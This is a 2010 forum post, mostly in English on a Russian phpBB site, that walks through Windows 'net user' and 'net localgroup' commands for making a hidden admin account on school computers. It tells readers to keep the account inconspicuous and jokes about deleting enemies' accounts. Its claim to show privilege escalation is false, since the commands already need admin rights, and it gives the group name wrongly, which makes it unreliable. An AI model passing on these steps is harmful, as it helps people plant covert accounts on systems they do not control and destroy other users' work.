*Drive*- Здесь рулят padonki
https://drivesource.ru/

Admin account создать через консоль - повышение привелегий
https://drivesource.ru/viewtopic.php?f=22&t=1121
Страница 1 из 1

Автор:  Padonak [ 28 июн 2010, 23:46 ]
Заголовок сообщения:  Admin account создать через консоль - повышение привелегий

Start>Run CMD
Now that you have a command prompt, you can add a new user (ie yourself) like so
Код:
C:>net user padonak /ADD

where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:
Код:
C:>net user padonak password /ADD

where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'HudoyPadonak' and a password of 'xren'
Код:
C:>net user HudoyPadonak xren /ADD

Right then, now that we can create accounts, let's delete them
Код:
C:>net user HudoyPadonak /DELETE

This will delete poor liddle HudoyPadonak's account. Awww. Do it to you enemies no only joking becuase they could have important work... well okay only if you REALLY hate them

Let's give you admin priveleges
Код:
C:>net localgroup administrator HudoyPadonak /ADD

This will make HudoyPadonak an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.

You can list all the localgroups by typing
Код:
C:>net localgroup

Running .exe files you can't usually run



Windows must die

Изображение

Страница 1 из 1 Часовой пояс: UTC + 3 часа [ Летнее время ]
Powered by phpBB® Forum Software © phpBB Group
http://www.phpbb.com/